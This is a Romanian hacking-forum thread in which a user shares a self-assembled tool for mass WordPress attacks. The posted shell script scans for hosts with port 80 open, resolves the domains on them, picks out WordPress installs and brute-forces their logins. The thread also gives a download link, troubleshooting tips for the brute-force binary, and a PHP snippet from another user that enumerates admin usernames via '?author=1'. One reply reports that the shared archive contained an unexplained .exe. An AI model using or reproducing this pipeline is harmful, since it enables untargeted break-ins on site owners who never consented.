sebywarlord Posted March 12, 2014 Report Share Posted March 12, 2014 (edited) Acum cateva zile mi-am facut un scanner de wordpress.Ok nu am codat eu nici 1% din el,doar am luat niste scripturi de pe net si le-am unit .Mersi lui @Elohim pentru script-ul de path disclosure Scannerul lucreaza in 4 parti1.Cauta ip-uri cu portul 80 deschis2.Gaseste toate domeniile hostate pe acele ip-uri3.Alege url-urile care au wordpress instalat4.Face bruteforce.Cum se foloseste ?./start A [ex ./start 80]echo "Starting to collect ips"#This part is for collecting ips on port 80./ss 80 -i eth0 -s 8 -a $1#This part is for getting urls from ipsecho "Starting to transform ips to domains"./getdns bios.txt#This part is for checking if the domains have wordpress installedecho "Starting to find domains with wordpress installed"cat url.txt | sort | uniq > hosts.txtpython findwp.py 500#This part is for cracking the wp-secho " Starting to bruteforce"./brute -i wpuri.txt -c 250Download : http://www.mediafire.com/download/jrexbn16132y7bc/wp.zipDaca aveti intrebari,reply aici!PS: Daca va place, dati si voi un like, un mersi,nu ca la scannerul ala de RDP care l-am postat (500 downloads si niciun merci. ) Edited March 12, 2014 by sebywarlord Quote Link to comment Share on other sites More sharing options...
Elohim Posted March 12, 2014 Report Share Posted March 12, 2014 Dragut. La ce script ai apelat pentru brute force? Quote Link to comment Share on other sites More sharing options...
BloodLust Posted March 12, 2014 Report Share Posted March 12, 2014 am o problema root@localhost:/var/tmp/wp# ./brutebash: ./brute: No such file or directorye singurul fiser care nu imi merge ce sai fac ? Quote Link to comment Share on other sites More sharing options...
sebywarlord Posted March 12, 2014 Author Report Share Posted March 12, 2014 @BloodLustProbabil ai sistemul de operare pe 64 biti,iar fisierul de brute e compilat pentru x86Incearca : yum install glibc.i686 Quote Link to comment Share on other sites More sharing options...
BloodLust Posted March 12, 2014 Report Share Posted March 12, 2014 ok mersi mult Quote Link to comment Share on other sites More sharing options...
Htich Posted March 12, 2014 Report Share Posted March 12, 2014 (edited) [root@localhost Python-2.7.6]# unzip wp.zipArchive: wp.zip inflating: 35934-762-sniper-rifle-dragunov-svd-s.exe---Houston we have a problem !Poti urca pe alt host scanu ? Edited March 12, 2014 by Htich Quote Link to comment Share on other sites More sharing options...
sebywarlord Posted March 12, 2014 Author Report Share Posted March 12, 2014 (edited) @HtichwpUpdated si in primul postEdit:Ce sloboz?35934-762-sniper-rifle-dragunov-svd-s.exegirlshare de cacat in plm,cum sa-ti modifice arhiva? Edited March 12, 2014 by sebywarlord Quote Link to comment Share on other sites More sharing options...
Htich Posted March 12, 2014 Report Share Posted March 12, 2014 Multumsc pt re-upload.Nu stiu poate mai baga cineva din "admini" ceva .exe sa "mai faca si ei rost de un honeypot" Quote Link to comment Share on other sites More sharing options...
intrus Posted March 14, 2014 Report Share Posted March 14, 2014 (edited) Unii modifica userul admin.. so.. $url = $host.'/?author=1'; $c = curl_init($url); curl_setopt($c, CURLOPT_RETURNTRANSFER, true); curl_setopt($c, CURLOPT_NOBODY,true); curl_setopt($c, CURLOPT_HEADER, true); $result = @curl_exec($c); curl_close($c); preg_match("/Location: (.*)/",$result,$m); $sparge = explode("/", $m[1]); $user = trim($sparge[4]); if ($user == "") { $user = "admin"; } Edited March 14, 2014 by intrus Quote Link to comment Share on other sites More sharing options...
l3tmeb3 Posted March 14, 2014 Report Share Posted March 14, 2014 La getdns ramane "blocat" .Cate linii suporta fisierul la care sa faca dns ? Quote Link to comment Share on other sites More sharing options...
sebywarlord Posted March 16, 2014 Author Report Share Posted March 16, 2014 Nu are limita.Nu ramane blocat numai ca nu arata output , le pune direct in url.txt Quote Link to comment Share on other sites More sharing options...